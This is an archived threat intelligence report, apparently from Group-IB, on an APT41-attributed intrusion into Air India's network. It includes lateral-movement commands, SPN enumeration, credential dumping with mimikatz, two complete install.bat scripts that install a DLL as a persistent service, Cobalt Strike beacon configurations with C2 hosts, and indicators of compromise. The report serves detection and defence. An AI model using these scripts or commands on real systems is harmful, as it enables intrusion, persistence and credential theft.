{ "id": "8561e7ef-30b6-4ff7-9b40-24a0111458ca", "created_at": "2026-04-06T00:08:22.867399Z", "updated_at": "2026-04-10T03:32:21.165436Z", "deleted_at": null, "sha1_hash": "fb7f9a83b11ab443479a3eb87a76d25600cece45", "title": "Big airline heist", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4540991, "plain_text": "Big airline heist\r\nArchived: 2026-04-05 13:22:35 UTC\r\nUPDATE: This blog post was updated on August 12, 2021 at the request of a third party.\r\nExecutive summary\r\nIn late May, Air India reported a massive passenger data breach. The announcement was preceded by data\r\nbreaches in various airline companies, including Singapore Airlines and Malaysia Airlines. According to the\r\npublic source data, these airlines use services of the same IT service provider. The media suggested the airline\r\nindustry was facing “a coordinated supply chain attack”. Air India was the first carrier to reveal more details about\r\nits security breach.\r\nThe data revealed by Air India suggested that the massive data breach that affected multiple carriers was a\r\nresult of the compromise of the airline’s IT service provider. That announcement prompted Group-IB Threat\r\nIntelligence analysts to look closer at the attack.\r\nUsing its external threat hunting tools, Group-IB’s Threat Intelligence team then discovered and attributed another\r\npreviously unknown cyberattack on Air India with moderate confidence to the Chinese nation-state threat actor\r\nknown as APT41. The campaign was codenamed ColunmTK.\r\nIn this blog post you will find:\r\nPreviously unknown details about the ColunmTK campaign\r\nEvidence of compromised workstations and exfiltration of 200 MB of data from Air India’s network\r\nDescriptions of TTPs used during the ColunmTK campaign\r\nConnections between APT41 and the infrastructure used during the ColunmTK campaign\r\nThe potential ramifications of this incident for the entire airline industry and carriers that might yet discover traces\r\nof ColunmTK in their networks are significant. To help companies detect and hunt for ColunmTK, we have\r\nprovided a full list of indicators of compromise (IOCs) that we retrieved. MITRE ATT\u0026CK, MITRE Shield, and\r\nrecommendations are available at the end of this blog post.\r\nGroup-IB’s Threat Intelligence team informed CERT India and Air India of its findings so that they can take the\r\nnecessary steps to mitigate the threat.\r\nBackground\r\nOn May 21, Air India, India’s flag carrier, published an official statement on their website about a data breach. The\r\nannouncement revealed that the breach was caused by a February incident at the airline’s IT service provider, which\r\nis responsible for processing customers’ personally identifiable information (PII). However, that statement has since\r\nbeen corrected. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects\r\nglobally, including data related to Air India’s customers.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 1 of 15\n\nShortly after Air India’s public announcement, the database allegedly related to their security breach was put up\r\nfor sale on an underground market at USD 3,000.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 2 of 15\n\nAccording to Group-IB’s Threat Intelligence system, the alleged database was published on a fraudulent resource\r\nknown for reselling data that has been published on various data-leak websites. Because the database had never\r\nsurfaced anywhere on the dark web, nor in the public domain, Group-IB researchers considered it fake and decided\r\nto instead look deeper and discovered that the post about Air India’s alleged data had nothing to do with what\r\nhappened in reality. Group-IB’s Threat Intelligence team soon realized that in this other attack on Air India they\r\nwere dealing with a sophisticated nation-state threat actor, rather than another financially motivated\r\ncybercriminal group.\r\nCompromise of Air India’s network\r\nIn mid-February 2021, Group-IB’s Threat Intelligence system detected infected devices that were part of Air\r\nIndia’s computer network. Starting from at least February 23, 2021, a device inside the company’s network\r\ncommunicated with a server with the IP address 185[.]118[.]166[.]66. According to Group-IB’s Network Graph, this\r\nserver has hosted Cobalt Strike, a popular post-exploitation framework, since December 11, 2020 (we will come\r\nback to it a little later).\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 3 of 15\n\nLifetime of a Cobalt Strike tag in Group-IB’s Network Graph\r\nThe patient zero that started communicating with the C\u0026C server was a device named «SITASERVER4» with the\r\nlocal IP address 172[.]16[.]11[.]103 and managed by AirIndia.\r\nAfter the attackers established persistence in the network and obtained passwords, they began moving laterally. The\r\nthreat actor collected information inside the local network, including names of network resources and their\r\naddresses.\r\nBelow are examples of commands that were used for lateral movement:\r\nDate Device name Command\r\n03/02/21\r\n06:43 PM\r\nWEBSERVER3\r\nrun: wmic /node:172[.]16[.]2[.]114 /user:test\\administrator /password:\r\n[REDACTED] process call create “c:\\users\\Public\\install.bat”\r\n03/03/21\r\n02:05 AM\r\nAILOAPOTHDT076 ping AILCCUALHSV002.\r\nThe results of some commands:\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 4 of 15\n\nHost\r\nShell\r\nCommand\r\nCommand Result\r\nAILCCUALHSV002\r\n– 172[.]24[.]3[.]24\r\nipconfig/all\r\nWindows IP Configuration Host Name . . . . . . . . . . . . :\r\nAILCCUALHSV002 Primary Dns Suffix . . . . . . . : ad[.]airindia[.]in\r\nNode Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No\r\nWINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . :\r\nad[.]airindia[.]in\r\nAILCCUALHSV001-\r\n172[.]24[.]3[.]22\r\nsetspn -T\r\nad[.]airindia[.]in\r\n-Q */* | findstr\r\nSQL\r\nMSSQLSvc/AILDELCCPDT011.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT011.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT017.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT017.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT018.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT018.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AASBOMCGODT009.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT020.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT020.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT023.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT032.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILDELCCPDT032.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDB01.ad[.]airindia[.]in:17001\r\nMSSQLSvc/AILDELCCPDB01.ad[.]airindia[.]in:PDWTDSSERVER\r\nMSSQLSvc/MAAAUCDT614.ad[.]airindia[.]in\r\nMSSQLSvc/AILMAAAUCDT614.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELGSDDT406.ad[.]airindia[.]in\r\nMSSQLSvc/AILBOMAPTDT107.ad[.]airindia[.]in\r\nMSSQLSvc/TRCOM.ad[.]airindia[.]in:1433\r\nMSSQLSvc/ATLDELGSDDT027.ad[.]airindia[.]in\r\nMSSQLSvc/AILOAPDITDT008.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILOAPDITDT008.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT041.ad[.]airindia[.]in\r\nMSSQLSvc/AILDELCCPDT041.ad[.]airindia[.]in:1433\r\nMSSQLSvc/AILMAAAUCDT179.ad[.]airindia[.]in\r\nThe attackers exfiltrated NTLM hashes and plain-text passwords from local workstations using hashdump and\r\nmimikatz. The attackers tried to escalate local privileges with the help of BadPotato malware. BadPotatoNet4.exe\r\nwas uploaded to one of the devices inside the victim’s network under the name SecurityHealthSystray.exe.\r\nAccording to our data, at least 20 devices from Air India’s network were compromised during the lateral movement\r\nstage. The attackers used DNS-txt requests to connect the bots to the C\u0026C server. The following domains were used\r\nfor DNS tunneling.\r\nns2[.]colunm[.]tk;\r\nns1[.]colunm[.]tk.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 5 of 15\n\nThe name of the campaign, ColunmTK, is derived from these initially discovered domains.\r\nIt was also found that the attackers extracted 233,390,032 bytes of data from the following devices:\r\nSITASERVER4\r\nAILCCUALHSV001\r\nAILDELCCPOSCE01\r\nAILDELCCPDB01\r\nWEBSERVER3\r\nAccording to Group-IB’s Threat Intelligence data, the compromised devices were located in different subnets,\r\nwhich may indicate that the compromise affected various segments of Air India’s network.\r\nWhile the initial attack vector remains unknown, according to Group-IB’s records, the attack on Air India lasted\r\nfor at least 2 months and 26 days. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons\r\nto other devices in the airline’s network.\r\nColunmTK Timeline\r\nConnections with APT41\r\nGroup-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by\r\nAPT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA),\r\nWinnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China’s\r\ninterests as well as committing financially motivated cybercrimes. According to Group-IB’s Threat Intelligence\r\nsystem, the threat actor has been active since at least 2007.\r\nAPT41 is known for stealing digital certificates for its cyber espionage operations. India is a frequent target of\r\nChinese nation-state adversaries.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 6 of 15\n\nWhen analyzing the network infrastructure of the C\u0026C-server involved in the cyberattack against Air India, Group-IB’s Threat Intelligence system revealed that the threat actor used a specific SSL certificate, which was detected\r\non five hosts only.\r\nIP address Location ASN Organization\r\n185.118.164[.]198 RU AS44493 Chelyabinsk-Signal LLC\r\n104.224.169[.]214 US AS19181 IT7 Networks Inc\r\n45.61.136[.]199 US AS53667 BL Networks\r\n185.118.166[.]66 RU AS44493 Chelyabinsk-Signal LLC\r\n149.28.134[.]209 SG AS20473 Vultr Holdings, LLC\r\nNetwork relations between hosts with a specific fingerprint presented in Group-IB’s Threat Intelligence system\r\nLet’s take a closer look at these five IP addresses.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 7 of 15\n\nOne of them, 45[.]61[.]136[.]199, was attributed to APT41(aka Barium) by Microsoft in their recent research.\r\nIt is worth looking at another IP address from the list: 104[.]224[.]169[.]214. This IP address was used as an A\r\nrecord for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host\r\nthe Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with\r\nColunmTK’s IP address 185[.]118[.]166[.]66. When analyzing the dns04[.]com subdomains, we found that these\r\ndomains were parked at the IP address 127.0.0.1 on the same date: April 15, 2021. According to Group-IB\r\nresearchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over.\r\nNetwork relations between hosts parked at 127.0.0.1. Source: Group-IB Threat Intelligence\r\nAnother interesting domain is service[.]dns22[.]ml. This domain shared the SSL certificate\r\nb3038101fd0e8b11c519f739f12c7e9b60234d3b with ColunmTK’s IP address and was parked at 127.0.0.1 on\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 8 of 15\n\nJanuary 15, 2021. Security researchers found that the IP address 104[.]224[.]169[.]214 was used as the IP address\r\nfor a shellcode loader in APT41’s earlier campaigns, in which the domain service[.]dns22[.]ml was also used.\r\nGroup-IB researchers discovered a file named “Install.bat” (SHA1-\r\n7185bb6f1dddca0e6b5a07b357529e2397cdee44). The file was uploaded by the attackers to some of the\r\ncompromised devices inside Air India’s network as part of the ColunmTK campaign. The file is very similar to\r\none used by APT41 in a different campaign described by FireEye researchers.\r\nIn both cases, the files were used to establish persistence in the network. The files are very similar in the way they\r\nlaunch a DLL file as a service and create keys in the registry.\r\nThe contents of the file “install.bat” from APT41’s This is Not a Test campaign:\r\n@echo off\r\nset \"WORK_DIR=C:\\Windows\\System32\"\r\nset \"DLL_NAME=storesyncsvc.dll\"\r\nset \"SERVICE_NAME=StorSyncSvc\"\r\nset \"DISPLAY_NAME=Storage Sync Service\"\r\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync rel\r\nsc stop %SERVICE_NAME%\r\nsc delete %SERVICE_NAME%\r\nmkdir %WORK_DIR%\r\ncopy \"%\r\ndp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_S\r\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share\r\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\r\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPA\r\nnet start \"%SERVICE_NAME%\"\r\nThe contents of the file “install.bat” from the ColunmTK campaign:\r\n@echo off\r\nset \"WORK_DIR=c:\\Windows\\System32\"\r\nset \"DLL_NAME=SecurityHealthSystray.dll\"\r\nset \"SERVICE_NAME=COMSysConfig\"\r\nset \"DISPLAY_NAME=COM+ Update Service\"\r\nset \"DESCRIPTION=\"\r\nsc stop %SERVICE_NAME%\r\nsc delete %SERVICE_NAME%\r\nmkdir %WORK_DIR%\r\ncopy \"%\r\ndp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\r\ndp0SecurityHealthSystra.ocx\" \"%WORK_DIR%\\SecurityHealthSystra.ocx\" /Y\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_S\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 9 of 15\n\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share\r\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\r\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPA\r\nnet start \"%SERVICE_NAME%\"\r\nGroup-IB researchers believe with moderate confidence that the ColunmTK campaign against Air India was\r\ncarried out by the Chinese nation-state threat actor APT41.\r\nAttribution of the ColunmTK campaign against Air India to APT41.\r\nColunmTK MITRE ATT\u0026CK and MITRE SHIELD\r\nBelow are indicators that were used in this campaign as well as MITRE ATT\u0026CK mapping and a\r\ncorresponding list of mitigation solutions. Companies should use MITRE ATT\u0026CK to better prepare for attacks\r\nand know what techniques are needed to mitigate security risks associated with this threat actor.\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 10 of 15\n\nIndicators of compromise\r\nBelow are indicators that were used in this campaign as well as MITRE ATT\u0026CK mapping and a\r\ncorresponding list of mitigation solutions. Companies should use MITRE ATT\u0026CK to better prepare for attacks\r\nand know what techniques are needed to mitigate security risks associated with this threat actor.\r\nNetwork indicators:\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 11 of 15\n\n185.118.164[.]198;\r\n104.224.169[.]214;\r\n45.61.136[.]199;\r\n185.118.166[.]66;\r\n149.28.134[.]209;\r\ncolunm[.]tk.\r\nFile name MD5\r\ninstall.bat 20aebf6e20c46b6bfe44f2828adf3b91\r\nSecurityHealthSystray.dll b6b06a95cfeeee0efe8bc0cd54eac71d\r\nSecurityHealthSystray.ocx 83249cff833182b3299cbd4aac539c9a\r\nBadPotatoNet4.exe 143278845a3f5276a1dd5860e7488313\r\nCOMSysUpdate.dll 559b7150d936fffe728092b160c14d28\r\ninstall.bat 9337952aa3be0dacfc12898df3180f02\r\nSecurityHealthSystray.ocx 212784cf25f0adfaf9ba46db41c373d5\r\nCOMSysUpdate.ocx d414c7ede5a9d6d30e6d3fe547e27484\r\nntoskrnl.exe 83e6da9cd8ccf9b0c04f00416b091076\r\nCOMSysUpdate.dll 7b501402c843034cd79151257aca189e\r\nCOMSysUpdate.ocx 69f5c5f67850acdb373ddd106adce48c\r\nSecurityHealthSystray.dll b071a62d2dd745743c6de5f115d633b1\r\nSecurityHealthSystray.ocx 019122b1d783646f99c73a3c399cc334\r\ninstall.bat f61dbac694d34c96830f184658610261\r\nSecurityHealthSystra.ocx fc208a4d04c085edcea1ec5f402057f9\r\nSecurityHealthSystray.dll 5528bb928e02926179fca52dd388b1f0\r\nSecurityHealthSystray.dll b8ecab09b7bfb42b9ace3666edf867a7\r\nSecurityHealthSystra.ocx c4be6b466807540a22f62ffa6829540f\r\nSecurityHealthSystra.ocx a00ab8ac0f11c3fcd5c557729afcbf89\r\nBeacon configuration from 185.118.166[.]66\r\n\"post-get.verb\" : \"\",\r\n\"process-inject-stub\" : \"d5nX4wNnwCo18Wx3jr4tPg==\",\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 12 of 15\n\n\"http-get.uri\" : \"cs[.]colunm[.]tk,/dpixel\",\r\n\"http-get.server.output\" : \"\",\r\n\"post-ex.spawnto_x64\" : \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n\"post-ex.spawnto_x86\" : \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n\"cryptoscheme\" : 0,\r\n\"process-inject-transform-x64\" : \"\",\r\n\"process-inject-transform-x86\" : \"\",\r\n\"maxdns\" : 255,\r\n\"process-inject-min_alloc\" : 0,\r\n\"http-post.client\" : \"\u0026Content-Type: application/octet-streamid\",\r\n\"dns_sleep\" : 0,\r\n\"ssl\" : true,\r\n\"SSH_Password_Pubkey\" : \"\",\r\n\"http-post.uri\" : \"/submit.php\",\r\n\"Proxy_UserName\" : \"\",\r\n\"cookieBeacon\" : 1,\r\n\"CFGCaution\" : 0,\r\n\"process-inject-start-rwx\" : 64,\r\n\"spawto\" : \"\",\r\n\"SSH_Host\" : \"\",\r\n\"stage.cleanup\" : 0,\r\n\"SSH_Username\" : \"\",\r\n\"watermark\" : 305419896,\r\n\"process-inject-use-rwx\" : 64,\r\n\"dns_idle\" : 0,\r\n\"sleeptime\" : 60000,\r\n\"dns\" : false,\r\n\"publickey\" : \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ\r\nCBkyCWDMC1Q6VqRZIY35+iU7KtrHy9+HnzzPxCetQ5toPMCqlwQEB9hj38O\r\nnrVdGJYcvb8X36PIo8JBQSIB+ejM0xYaWwWIoLYhG1CSUJPgLc24wjjkW3/2wB\r\nuLrgTuYxNeylf75fE6cQtSeimLeHp/XjyQPfYbUQgiCSqs7KSUwIDAQABAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAA==\",\r\n\"pipename\" : \"\",\r\n\"SSH_Password_Plaintext\" : \"\",\r\n\"Proxy_Password\" : \"\",\r\n\"Proxy_HostName\" : \"\",\r\n\"host_header\" : \"\",\r\n\"jitter\" : 0,\r\n\"killdate\" : 0,\r\n\"text_section\" : 0,\r\n\"port\" : 8443,\r\n\"shouldChunkPosts\" : 0,\r\n\"http-get.client\" : \"Cookie\",\r\n\"funk\" : 0,\r\n\"SSH_Port\" : 0,\r\n\"http-get.verb\" : \"GET\",\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 13 of 15\n\n\"proxy_type\" : 2,\r\n\"user-agent\" : \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.\r\n1; WOW64; Trident/5.0; MANM; MANM)\"\r\nBeacon configuration from 149.28.134[.]209\r\n{\r\n \"func\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"DNS_sleep(ms)\": 0,\r\n \"HostHeader\": \"\",\r\n \"Maxdns\": 255,\r\n \"Proxy_AccessType\": \"2 (use IE settings)\",\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"binary.http-get.server.output\": \"AAAABAAAAAEAAA1NAAAAAgAADSYAAAANAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"bUsesCookies\": \"True\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Watermark\": 305419896,\r\n \"bProcInject_MinAllocSize\": 17500,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"version\": \"4\",\r\n \"PipeName\": \"\",\r\n \"UserAgent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\r\n \"KillDate\": \"0\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"textSectionEnd (0 if !sleep_mask)\": 154122,\r\n \"BeaconType\": \"8 (HTTPS)\",\r\n \"HttpGet_Metadata\": [\r\n \"Host: fortawesome.com\",\r\n \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Accept-Encoding: gzip, deflate\",\r\n \"Referer: https://fortawesome.com/\",\r\n \"_fortawesome_session=\",\r\n \"Cookie\"\r\n ],\r\n \"ProcInject_PrependAppend_x86\": \"AAAABJCQkJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"DNS_idle\": \"8.8.8.8\",\r\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\r\n \"ProcInject_PrependAppend_x64\": \"AAAABJCQkJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"Jitter\": 37,\r\n \"SleepTime\": 1000,\r\n \"bStageCleanup\": \"True\",\r\n \"C2Server\": \"149.28.134.209,/users/sign_in\",\r\n \"MaxGetSize\": 1404878,\r\n \"CryptoScheme\": 0,\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 14 of 15\n\n\"PublicKey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCLWqwFbcEMqEaiaw6K1ORaRyQ62LPDVjE/Wb6tbstdNR2Y\r\n \"obfuscate_section\": \"AGACAFH9AgAAAAMAwKADAACwAwAwzgMAAAAAAAAAAAA=\",\r\n \"ProcInject_Execute\": [\r\n \"6\"\r\n ],\r\n \"ProcInject_Stub\": \"UGQyVORjQ+JF+/sEjjvVYA==\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"HttpPost_Metadata\": [\r\n \"Host: fortawesome.com\",\r\n \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Accept-Encoding: gzip, deflate\",\r\n \"__uid\",\r\n \"remember_me=on\u0026authenticity_token=\"\r\n ],\r\n \"bCFGCaution\": \"False\",\r\n \"Port\": 443,\r\n \"HttpPostUri\": \"/signup/custom\"\r\n}\r\nSource: https://www.group-ib.com/blog/colunmtk-apt41/\r\nhttps://www.group-ib.com/blog/colunmtk-apt41/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.group-ib.com/blog/colunmtk-apt41/" ], "report_names": [ "colunmtk-apt41" ], "threat_actors": [ { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "273a41a8-5115-4f55-865f-0960a765f18c", "created_at": "2022-10-25T16:07:24.397947Z", "updated_at": "2026-04-10T02:00:04.974605Z", "deleted_at": null, "main_name": "Wicked Spider", "aliases": [ "APT 22", "Bronze Export", "Bronze Olive", "Wicked Spider" ], "source_name": "ETDA:Wicked Spider", "tools": [ "Agent.dhwf", "AngryRebel", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EternalBlue", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "PCRat", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "00e7a6ed-1880-4391-b0b9-1f46fae0e5cc", "created_at": "2025-08-07T02:03:24.591024Z", "updated_at": "2026-04-10T02:00:03.717645Z", "deleted_at": null, "main_name": "BRONZE EXPORT", "aliases": [ "TG-3279 ", "Wicked Spider " ], "source_name": "Secureworks:BRONZE EXPORT", "tools": [ "Conpee", "PlugX", "PwDump" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434102, "ts_updated_at": 1775791941, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fb7f9a83b11ab443479a3eb87a76d25600cece45.pdf", "text": "https://archive.orkl.eu/fb7f9a83b11ab443479a3eb87a76d25600cece45.txt", "img": "https://archive.orkl.eu/fb7f9a83b11ab443479a3eb87a76d25600cece45.jpg" } }